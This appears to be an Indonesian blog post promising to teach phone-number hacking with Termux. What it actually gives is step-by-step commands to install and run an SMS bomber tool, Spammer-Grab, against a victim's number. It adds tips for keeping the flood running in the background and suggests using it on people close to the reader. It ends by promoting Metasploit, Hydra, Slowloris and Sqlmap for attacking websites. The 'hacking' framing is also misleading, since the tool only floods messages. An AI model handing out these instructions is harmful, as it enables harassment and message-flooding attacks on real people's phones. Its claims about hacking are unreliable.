Cara Hack Nomor Telepon Menggunakan Termux 2022

Cara Hack Nomor Telepon Menggunakan Termux
Cara Hack Nomor Telepon Menggunakan Termux - Termux merupakan salah satu jensi aplikasi yang didesain atau dibuat khusus untuk sistem operasi perangkat Android.

Aplikasi Termux ini dapat anda pakai buat Smartphone yang telah dibekali dengan OS Android mulai itu versi 5.0 maupun yang lolipop.

Pengguna juga bisa menjalankan berbagai macam perintah Linux yang sudah sesuai dengan distribusi yang sudah di instal.


Hal ini akan dapat berjalan sebab perangkat Android ini sendiri diciptakan diatas kernel Linux tersebut.


Pembahasan Cara Hack Nomor Telepon Menggunakan Termux

Akan tetapi sebetulnya, apakah anda sudah tau apa itu aplikasi Termux dan apa saja kegunaan dari aplikasi Termux ini? Disini kami akan membahas atau membagikan sedikit hal tentang aplikasi Termux.

Dengan menggunakan aplikasi Termux ini, maka anda dapat melakukan begitu banyak hal, minsalnya itu seperti buat melacak lokasi atau tempat milik orang lain maupun melacak keberadaan Smartphoner yang sudah hilang.

Akan tetapi, untuk kali ini kami akan membahas bagaiman cara melakukan hack nomor HP dengan memakai aplikasi Termux dengan menggunakan script Termux.

Jika anda sudah sangat penasaran sekali bagaimana caranya untuk melalukan hack dengan nomor HP menggunakan aplikasi Termux ini.

Maka anda dapat simak artikel yang kali ini hingga selesai ya, agar anda mengetahui bagaimana caranya.


Dengan begini, anda nantinya akan dapat melakukan hack nomor HP orang terdekat anda, jika dirasa ada yang mencurigakan.

Tidak usah berlama-lama lagi, langsung saja simak cara hack nomor Telepon menggunakan Termux berikut ini.


Cara Hack Nomor Telepon Menggunakan Termux


Cara Hack Nomor Telepon Menggunakan Termux dengan SMS Bomber

Cara Hack Nomor Telepon Menggunakan Termux
Cara Hack Nomor Telepon Menggunakan Termux dengan SMS Bomber
SMS Bomber merupakan seseorang yang selalu meneror orang lain dengan menggunakan ratusan hingga ribuan pesan ke Smartphone si korban, dan hal itu dapat membuat Smartphone si korban menjadi hang!!


Tidak usah berlama-lama lagi, berikut ini script cara menginstall Spammer Grab untuk cara hack nomor Telepon menggunakan Termux dengan SMS Bomber:
  • $ pkg update && pkg upgrade
  • $ pkg install git
  • $ pkg install python2
  • $ pip2 install requests
  • $ git clone https://github.com/p4kl0nc4t/Spammer-Grab
  • $ ls
  • $ chmod +x Spammer-Grab
  • $ ls
  • $ chmod 777 spammerv1.py
  • $ python2 spammerv1.py -h

Untuk langkah-langkah cara untuk memakainya itu cukup tinggal anda tambahkan nomor HPnya si korban di belakang spammerv1.py tersebut, misalnya seperti: $ python2 spammerv1.py 6285234765987.

NOTE: Jangan pernah memakai 0838 tapi anda pakai 62838, jangan juga format nomor angka 0, akan tetapi ganti dengan angka 62.

Untuk dapat Bomb kepada si korban tanpa perlu mebuka aplikasi Termux terus-menerus, anda dapat tekan Home, supaya dapat mebuka apk yang lainnya tanpa perlu menghentikan proses Bomb kepada si korban.


Untuk cara bisa menghentikan Spammer-Grab ini, silahkan klik Vol Down + C atau jika terdapat di dalam keyboard ya klik CTRL + C.

Jika anda belum memiliki aplikasi Termux ini, bisa mengunduhnya melalui lin yang berikut ini: Termux.


Akhir Kata

Apakah Termux ini dapat dipakai huat melakukan hacking sebuah situs atau website? Aplikasi Termux ini sangat dapat anda pakai buat menghack website.

Dengan memakai beberapa tools tambahan di perangkat Andoroid dan juga Chrome yang antara lain yaitu Metasploit Framework, Hydra, Nmap, Slowloris, Bettercap, dan juga Sqlmap.

Selain untuk hack nomor HP, melalui aplikasi Termux ini juga anda bisa melakukan begitu banyak hal yakni seperti melacak lokasi orang lain, melacak lokasi keberadaan HP, dan yang lain sebagainya.

Itulah dia keseluruhan pembahasan kami pada artikel yang kali ini tentang cara hack nomor Telepon menggunakan Termux. Semoga bermnfaat dan selamat mencoba.
Dody S. Seseorang yang senang belajar dan sharing segala hal tentang teknologi.

Tidak ada komentar:

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel